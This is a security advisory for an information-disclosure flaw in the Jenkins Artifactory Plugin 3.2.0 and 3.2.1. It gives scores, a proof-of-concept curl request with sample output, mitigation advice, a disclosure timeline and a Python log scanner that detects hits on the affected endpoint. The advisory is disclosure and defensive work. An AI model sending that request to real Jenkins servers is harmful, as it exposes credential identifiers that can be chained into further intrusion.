CVSS2: 4 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3: 4.3 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

EPSS: 0.011 Low
Percentile: 84.4%
An exploitable information disclosure vulnerability exists in the fillCredentialsIdItems endpoint of the Jenkins Artifactory Plugin 3.2.0 and 3.2.1. As a result of this vulnerability, a crafted HTTP request from a user with Overall/Read permissions (such as an anonymous user, if enabled) can cause affected versions of this plugin to disclose credential identifiers from the Jenkins credentials database.
The result of this vulnerability is low-level information disclosure, which may be used in conjunction with previously reported vulnerabilities, such as those covered in TALOS-2019-0787.
Jenkins Artifactory Plugin 3.2.1
Jenkins Artifactory Plugin 3.2.0
<https://www.jfrog.com/confluence/display/RTF/Jenkins+Artifactory+Plug-in>
<https://github.com/jenkinsci/artifactory-plugin>
4.3 - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-285: Improper Authorization
The Jenkins Artifactory Plugin brings Artifactory's Build Integration support to Jenkins.
This vulnerability exists in the fillCredentialsIdItems endpoint exposed by the doFillCredentialsIdItems method of org.jfrog.hudson.ArtifactoryBuilder due to a missing Jenkins permission check. The result of this vulnerability is low-level information disclosure. This information may be useful to an attacker, as it may be used in conjunction with additional vulnerabilities in this, or other, Jenkins plugins (see TALOS-2019-0787).
# List username / password credentials on target Jenkins instance.
$ curl -s -X GET -G \
    -d 'pretty=true' \
    'http://jenkins.docker.local:8080/descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems'
{
  "_class": "com.cloudbees.plugins.credentials.common.StandardListBoxModel",
  "values": [
    {
      "name": "- none -",
      "selected": false,
      "value": ""
    },
    {
      "name": "BBBBBB/****** (ExampleOnly)",
      "selected": false,
      "value": "01e367ef-54fb-4da0-8044-5112935037bb"
    },
    {
      "name": "SecureUsername/****** (Credentials for X)",
      "selected": false,
      "value": "287fcbe2-177e-4108-ac58-efdc0a507376"
    }
  ]
}
Until the vendor produces a patched version, this plugin should be disabled (if possible), or Overall/Read permissions should be removed from users who do not need them (such as anonymous access).
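One way to look for requests to this endpoint in HTTP access logs, as an added example that is not part of the original advisory. It assumes Common/Combined Log Format (for instance from a reverse proxy in front of Jenkins); the function name, sample log lines, addresses and user names are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoint named in the advisory; a context path such as /jenkins may precede it.
ENDPOINT = "/descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems"

# Assumption: Common/Combined Log Format (client, ident, user, [time], "request", status).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_endpoint_hits(lines):
    """Return one dict per logged request to the fillCredentialsIdItems endpoint."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        # Drop the query string, decode percent-escapes and any trailing slash.
        path = unquote(urlsplit(m["target"]).path).rstrip("/")
        if not path.endswith(ENDPOINT):
            continue
        status = int(m["status"])
        hits.append({
            "client": m["client"],
            "user": None if m["user"] == "-" else m["user"],  # None = unauthenticated
            "time": m["ts"],
            "status": status,
            # A 200 means the credentials list box model was returned to the caller.
            "served": status == 200,
        })
    return hits

# Constructed sample log lines (documentation address ranges, invented user).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jun/2019:10:01:22 +0000] "GET /descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems?pretty=true HTTP/1.1" 200 412',
    '192.0.2.10 - - [04/Jun/2019:10:01:25 +0000] "GET /job/build-app/ HTTP/1.1" 200 9120',
    '198.51.100.7 - alice [04/Jun/2019:10:02:03 +0000] "POST /jenkins/descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems HTTP/1.1" 403 512',
    '203.0.113.5 - - [04/Jun/2019:10:03:40 +0000] "GET /descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentials%49dItems/ HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for hit in find_endpoint_hits(SAMPLE_LOG):
        who = hit["user"] or "anonymous"
        print(f'{hit["time"]} {hit["client"]} {who} status={hit["status"]} served={hit["served"]}')
```

Hits with `served` set and no user name are the ones to review first, since they show the list being returned to an unauthenticated caller.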
Discovered by Peter Adkins of Cisco Umbrella.
2019-03-12 - Vendor Disclosure
2019-05-28 - Vendor Patched
2019-06-04 - Public Release